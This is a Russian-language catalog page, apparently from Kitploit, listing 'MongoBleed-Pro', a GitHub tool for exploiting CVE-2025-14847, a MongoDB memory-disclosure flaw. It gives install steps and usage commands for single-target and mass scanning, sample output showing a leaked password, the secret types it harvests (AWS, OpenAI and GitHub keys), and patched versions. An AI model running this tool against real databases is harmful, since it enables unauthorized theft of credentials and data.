Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-14847_Expolit — Эксплойт-инструмент для CVE-2025-14847, уязвимости раскрытия памяти в MongoDB, позволяющий многопоточное извлечение конфиденциальных данных и секретов из уязвимых экземпляров. | Kitploit
Инструменты/GitHubGitHub/alexcyberx/cve-2025-14847_expolit
Криминалистика памятиАнализ уязвимостейЭксплуатацияЭксфильтрация данныхТестирование на ПроникновениеОбнаружение СекретовБезопасность Баз Данных
GitHubalexcyberx/cve-2025-14847_expolit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-14847_Expolit

Эксплойт-инструмент для CVE-2025-14847, уязвимости раскрытия памяти в MongoDB, позволяющий многопоточное извлечение конфиденциальных данных и секретов из уязвимых экземпляров.

Репозиторий
248 месяцев назадЕщё не проверено

MongoBleed-Pro ☠️

CVE Python Лицензия Статус

Продвинутый инструмент для эксплуатации утечки памяти MongoDB
Keep Learning | Keep Hacking with Alexcyberx


🔥 О программе

MongoBleed-Pro — это продвинутый инструмент для эксплуатации CVE-2025-14847, критической уязвимости раскрытия памяти в обработке сжатия zlib в MongoDB. Этот инструмент позволяет исследователям безопасности извлекать конфиденциальные данные из уязвимых экземпляров MongoDB.

⚠️ Отказ от ответственности

Данный инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте соответствующее разрешение перед тестированием.


💀 Детали уязвимости


🚀 Возможности

  • ☠️ Интерфейс в стиле хакера — элитный терминальный интерфейс с анимациями
  • ⚡ Многопоточное сканирование — быстрое извлечение памяти с настраиваемым количеством потоков
  • 🎯 Автоматическое обнаружение уязвимости — автоматическая проверка перед эксплуатацией
  • 🔑 Обнаружение секретных паттернов — находит ключи AWS, токены API, пароли, email
  • 📊 Прогресс в реальном времени — визуализация утечки памяти в реальном времени
  • 💾 Экспорт данных — сохранение извлечённых данных в файлы для анализа
  • 🌐 Массовое сканирование — сканирование нескольких целей из файла

📦 Установка

root@kitploit:~
# Клонируйте репозиторий
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Установите зависимости
pip install -r requirements.txt

🎮 Использование

Базовое использование

root@kitploit:~
python3 mongobleed_pro.py

Целевой хост

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Нестандартный порт

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Массовое сканирование

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Расширенные опции

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

Все опции


📸 Скриншоты

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 ЗАПУСК ПОСЛЕДОВАТЕЛЬНОСТИ ИЗВЛЕЧЕНИЯ ПАМЯТИ 💀          ║
╚══════════════════════════════════════════════════════════════╝

⚡ Цель захвачена: 192.168.1.100:27017
   ✓ Порт ОТКРЫТ
   ☠️  УЯЗВИМО! Запуск атаки...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  ТРОФЕЙ ПОЛУЧЕН: 🔐 Пароль
      → admin_pass=SuperSecret123

╔══════════════════ ИЗВЛЕЧЕНИЕ ЗАВЕРШЕНО ══════════════════╗
║  💾 Извлечено байт: 125,847
║  📦 Уникальных фрагментов: 342
║  🔑 Найдено секретов: 5
╚══════════════════════════════════════════════════════════╝

🔑 Обнаруживаемые типы секретов

  • 🔑 Ключи AWS Access (AKIA...)
  • 🤖 API-ключи OpenAI (sk-...)
  • 🐙 Токены GitHub (ghp_...)
  • 🔐 Пароли и секреты
  • 📧 Адреса электронной почты

📁 Выходные файлы

ФайлОписание
loot_<host>.txtИзвлечённые секреты в читаемом формате
dump_<host>.binСырой дамп памяти для ручного анализа

🛡️ Смягчение

Если вы администратор MongoDB, обновитесь до исправленных версий:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Автор

alexcyberx

  • 🐦 Instagram: @alex_cyberx

📜 Лицензия

Этот проект лицензирован на условиях лицензии MIT — подробнее в файле LICENSE.


⭐ Поддержка

Если этот инструмент оказался для вас полезным, поставьте ⭐ на GitHub!


「 Keep Learning | Keep Hacking 」
Сделано с ❤️ by alexcyberx

Скачать инструмент
СвойствоЗначение
CVE IDCVE-2025-14847
Тип уязвимостиРаскрытие памяти
Затронутые версииMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
Корневая причинаПереполнение буфера при чтении в декомпрессии zlib
ВоздействиеНеаутентифицированная удалённая утечка памяти
АргументОписаниеПо умолчанию
--targetIP/URL целиИнтерактивный запрос
--fileФайл со списком целейNone
--threadsКоличество потоков50
--min-offsetМинимальное смещение памяти20
--max-offsetМаксимальное смещение памяти8192